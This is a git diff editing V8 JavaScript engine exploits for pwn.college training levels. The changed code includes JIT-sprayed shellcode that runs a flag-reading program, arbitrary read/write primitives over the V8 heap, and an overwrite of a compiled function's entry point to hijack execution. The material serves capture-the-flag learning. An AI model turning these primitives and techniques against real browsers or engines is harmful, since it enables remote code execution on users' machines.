diff --git a/JavaScript/PwnCollegeV8Exploitation/Level3/Exploit.js b/JavaScript/PwnCollegeV8Exploitation/Level3/Exploit.js
index f9c9337..37340b7 100644
--- a/JavaScript/PwnCollegeV8Exploitation/Level3/Exploit.js
+++ b/JavaScript/PwnCollegeV8Exploitation/Level3/Exploit.js
@@ -36,7 +36,7 @@ function shellcode() { // Promote to ensure not GC during training
     // JIT spray machine code form of `execve("catflag", NULL, NULL)`
     return [1.9995716422075807e-246, 1.9710255944286777e-246, 1.97118242283721e-246, 1.971136949489835e-246, 1.9711826272869888e-246, 1.9711829003383248e-246, -9.254983612527998e+61];
 }
-for (let i = 0; i < 100000; i++) shellcode(); // Trigger MAGLEV compilation
+for (let i = 0; i < 10000; i++) shellcode(); // Trigger MAGLEV compilation
 
 // Create a PACKED_DOUBLE_ELEMENTS array contains faked PACKED_DOUBLE_ELEMENTS array
 // map, properties, elements, length --- first three field are static roots
@@ -64,7 +64,7 @@ function ArbWrite64(cage_addr, value) { // int32, bigint
     arr[1] = c2f(ptr(cage_addr - 0x8), 0x00008000);
     let written = b2f(value);
     fakearr[0] = written;
-    console.log(`ArbWrite64 ${cage_addr.toString(16)}: ${written.toString(16)}`);
+    console.log(`ArbWrite64 ${cage_addr.toString(16)}: ${value.toString(16)}`);
 }
 
 // ArbRead64(0xfffffff0);
@@ -74,16 +74,17 @@ function ArbWrite64(cage_addr, value) { // int32, bigint
 function ArbRead32(cage_addr) { // int32 -> int32
     if (cage_addr & 0x3) throw new Error("Must DWORD Aligned");
     bi64a[0] = ArbRead64(cage_addr & 0xfffffff8);
-    let result = si32a[(cage_addr & 0x4) >> 2];
+    let result = i32a[(cage_addr & 0x4) >> 2];
     console.log(`ArbRead32 ${cage_addr.toString(16)}: ${result.toString(16)}`);
     return result;
 }
 
+// DWORD Aligned
 function ArbWrite32(cage_addr, value) { // int32, int32 -> void
     if (cage_addr & 0x3) throw new Error("Must DWORD Aligned");
     let QWORD_Aligned_cage_addr = cage_addr & 0xfffffff8;
     bi64a[0] = ArbRead64(QWORD_Aligned_cage_addr);
-    si32a[(cage_addr & 0x4) >> 2] = value;
+    i32a[(cage_addr & 0x4) >> 2] = value;
     ArbWrite64(QWORD_Aligned_cage_addr, bi64a[0]);
     console.log(`ArbWrite32 ${cage_addr.toString(16)}: ${value.toString(16)}`);
 }
@@ -101,5 +102,3 @@ let instruction_start = ArbRead32(instruction_start_addr);
 console.log("instruction_start: " + instruction_start.toString(16));
 ArbWrite32(instruction_start_addr, instruction_start + 0x6B);
 shellcode();
-
-// Due to heap fengshui, the possibility of getting flag by running exploit once is 1/10
\ No newline at end of file
diff --git a/JavaScript/PwnCollegeV8Exploitation/Level4/Exploit.js b/JavaScript/PwnCollegeV8Exploitation/Level4/Exploit.js
index a10f78c..bc26401 100644
--- a/JavaScript/PwnCollegeV8Exploitation/Level4/Exploit.js
+++ b/JavaScript/PwnCollegeV8Exploitation/Level4/Exploit.js
@@ -35,7 +35,7 @@ function shellcode() { // Promote to ensure not GC during training
     // JIT spray machine code form of `execve("catflag", NULL, NULL)`
     return [1.9995716422075807e-246, 1.9710255944286777e-246, 1.97118242283721e-246, 1.971136949489835e-246, 1.9711826272869888e-246, 1.9711829003383248e-246, -9.254983612527998e+61];
 }
-for (let i = 0; i < 100000; i++) shellcode(); // Trigger MAGLEV compilation
+for (let i = 0; i < 10000; i++) shellcode(); // Trigger MAGLEV compilation
 
 let placeholder = {};
 let corrupt_arr = [2.30234590962020889586281057477E-320];
@@ -85,23 +85,24 @@ function ArbWrite64(cage_addr, value) { // int32, bigint
     corrupt_arr[corrupt_arr_0_to_double_arr_element_offset] = c2f(ptr(cage_addr - 0x8), 0x00000002);
     let written = b2f(value);
     double_arr[0] = written;
-    console.log(`ArbWrite64 ${cage_addr.toString(16)}: ${written.toString(16)}`);
+    console.log(`ArbWrite64 ${cage_addr.toString(16)}: ${value.toString(16)}`);
 }
 
 // DWORD Aligned
 function ArbRead32(cage_addr) { // int32 -> int32
     if (cage_addr & 0x3) throw new Error("Must DWORD Aligned");
     bi64a[0] = ArbRead64(cage_addr & 0xfffffff8);
-    let result = si32a[(cage_addr & 0x4) >> 2];
+    let result = i32a[(cage_addr & 0x4) >> 2];
     console.log(`ArbRead32 ${cage_addr.toString(16)}: ${result.toString(16)}`);
     return result;
 }
 
+// DWORD Aligned
 function ArbWrite32(cage_addr, value) { // int32, int32 -> void
     if (cage_addr & 0x3) throw new Error("Must DWORD Aligned");
     let QWORD_Aligned_cage_addr = cage_addr & 0xfffffff8;
     bi64a[0] = ArbRead64(QWORD_Aligned_cage_addr);
-    si32a[(cage_addr & 0x4) >> 2] = value;
+    i32a[(cage_addr & 0x4) >> 2] = value;
     ArbWrite64(QWORD_Aligned_cage_addr, bi64a[0]);
     console.log(`ArbWrite32 ${cage_addr.toString(16)}: ${value.toString(16)}`);
 }
@@ -115,5 +116,3 @@ let instruction_start = ArbRead32(instruction_start_addr);
 console.log("instruction_start: " + instruction_start.toString(16));
 ArbWrite32(instruction_start_addr, instruction_start + 0x6B);
 shellcode();
-
-// the possibility of getting flag by running exploit once is 1/10
\ No newline at end of file